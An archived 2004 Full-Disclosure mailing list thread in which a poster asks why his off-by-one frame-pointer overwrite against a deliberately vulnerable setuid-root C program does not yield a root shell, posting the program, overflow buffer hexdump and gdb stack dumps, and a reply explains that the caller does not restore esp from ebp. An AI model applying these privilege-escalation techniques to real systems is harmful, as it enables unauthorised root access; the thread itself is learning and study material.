lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <F21C7C637A79E84783A75AE36EAFE3DE02F30571@zbnalpex002.na.webmd.net>
From: Jason.Deckard at webmd.net (Deckard, Jason)
Subject: exploiting off by one

Hi Joe,

I don't think the value in ebp is being used by main's caller.  As you know,
the calling convention requires the called procedure to preserve the state
of ebp, but that is no guarantee that the caller will use ebp to restore
esp.

Looking at a disassembled version of your code, I can see gcc (version 3.2.3
here) reclaims the parts of the stack used by parameters by increasing esp
with a constant value.  For example:

	lea	0xffffff78(%ebp),%eax
	push	%eax
	call	80482c8
	add	$0x8,%esp

I suspect something similar is being done by main's caller.  My apologies if
I'm missing something obvious here.

Regards,
Jason Deckard

-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joe Hickory
Sent: Thursday, April 15, 2004 2:26 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] exploiting off by one


hi fd, 
 
i'm trying to exploit some overflows to see how it works. i can exploit a
"normal" stack overflow without problem, but now i'm 
trying to exploit an off by one overflow and have some questions, first see
what i did: 
  
vulnerable program: 
 
#include <stdio.h> 
#include <unistd.h> 
#include <sys/types.h> 
 
#define BUFSIZE 128 
 
int main(int argc, char **argv) { 
        char buffer[BUFSIZE]; 
        int i, bufsiz; 
        uid_t userid; 
        bufsiz = BUFSIZE; 
 
        userid = geteuid(); 
        setuid(userid); 
        printf("userid: %i \n", userid); 
        printf("buffsize: %i \n", sizeof(buffer)); 
        printf("buffsize: %i \n", bufsiz); 
        for(i=0;i<=sizeof(buffer);i++) { 
                buffer[i] = argv[1][i]; 
        } 
        printf("buffsize: %i \n", strlen(buffer)); 
        printf("buffer: %s\n", buffer); 
 
        return 0; 
} 
 
 
$ ls -l 
-rwsr-xr-x   1 root  wheel     7788 Apr 14 23:43 offbyone 
 
STARTING EGGSHELL: 
 
$ ./eggframeshell 134 68 1100 
	$EGG at:        0xcfbfd634 
	last_byte: 44 
OVERFLOW BUFFER: 
$ echo -n $IJV | hexdump -v 
0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000070 d634 cfbf d634 cfbf d634 4444 4444 4444 
0000080 4444 cfbf 
0000084 
 
$ gdb ./offbyone 
GNU gdb 4.16.1 
Copyright 1996 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain
conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i386-unknown-openbsd3.5"... 
(gdb) break 21 
warning: gdb ignores `const' qualifiers. 
Breakpoint 1 at 0x667: file offbyone.c, line 21. 
(gdb) run $IJV 
Starting program: /./offbyone $IJV 
userid: 1000 
buffsize: 128 
buffsize: 128 
 
Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21 
21              printf("buffsize: %i \n", strlen(buffer)); 
(gdb) info frame 
Stack level 0, frame at 0xcfbfd1c0: 
 eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1 
 called by frame at 0xcfbfd144 
 source language c. 
 Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220 
 Locals at 0xcfbfd1c0, Previous frame's sp is 0x0 
 Saved registers: 
  ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4

(gdb) x/100x $esp 
0xcfbfd118:     0xcfbfd368      0xcfbfd220      0x00000001      0x00000000 
0xcfbfd128:     0x00000000      0xcfbfd17c      0x48f31671      0x000003e8 
0xcfbfd138:     0x00000080      0x00000081      0xcfbfd634      0xcfbfd634 
0xcfbfd148:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd158:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd168:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd178:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd188:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd198:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1a8:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1b8:     0x4444d634      0x44444444      0xcfbfd144      0x000004b1 
0xcfbfd1c8:     0x00000002      0xcfbfd220      0xcfbfd22c      0xcfbfd368 
0xcfbfd1d8:     0xcfbfd1fc      0x00000385      0x0000049f      0x00000000 
0xcfbfd1e8:     0xcfbfd21c      0x00001000      0x48f2e000      0x00000000 
0xcfbfd1f8:     0x00000410      0xcfbfd21c      0x00000427      0x00000002 
0xcfbfd208:     0xcfbfd220      0xcfbfd22c      0x00000000      0xcfbfdff0 
0xcfbfd218:     0x00000000      0x00000002      0xcfbfd368      0xcfbfd374 
0xcfbfd228:     0x00000000      0xcfbfd3f9      0xcfbfd424      0xcfbfd495 
0xcfbfd238:     0xcfbfd4a3      0xcfbfd4b1      0xcfbfd4c9      0xcfbfd4dd 
0xcfbfd248:     0xcfbfd4f4      0xcfbfd519      0xcfbfd536      0xcfbfd5bf 
0xcfbfd258:     0xcfbfd5ca      0xcfbfd5dd      0xcfbfdddd      0x00000000 
0xcfbfd268:     0x00000003      0x00000034      0x00000004      0x00000020 
0xcfbfd278:     0x00000005      0x00000006      0x00000006      0x00001000 
0xcfbfd288:     0x00000007      0x48f2e000      0x00000008      0x00000000 
0xcfbfd298:     0x00000009      0x00000410      0x00000000      0x00000000 
(gdb) 
(gdb) x/x  0xcfbfd634 
0xcfbfd634:     0x90909090 
 
$ ./offbyone $IJV 
userid: 0 
buffsize: 128 
buffsize: 128 
buffsize: 134 
buffer:

4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???
4???4???4???4???4???4???4???4???4???4???4???4?DDDDDDD????

$ 
 
hope its enough information. just my question is: i manipulated the least
significant byte of the frame pointer, pointing into my 
buffer. there in my buffer is the address of my shellcode as the manipulated
returnaddress. but the program is not segfaulting, if 
the pointer points to $somewhere. it always exits normally, without opening
a root shell to me. 
 
i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti overflow
protection disabled, "normal" overflow works well) 
 
hope anybody can enlighten me.  
 
joe 

-- 
NEU : GMX Internet.FreeDSL
Ab sofort DSL-Tarif ohne Grundgeb?hr: http://www.gmx.net/info

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ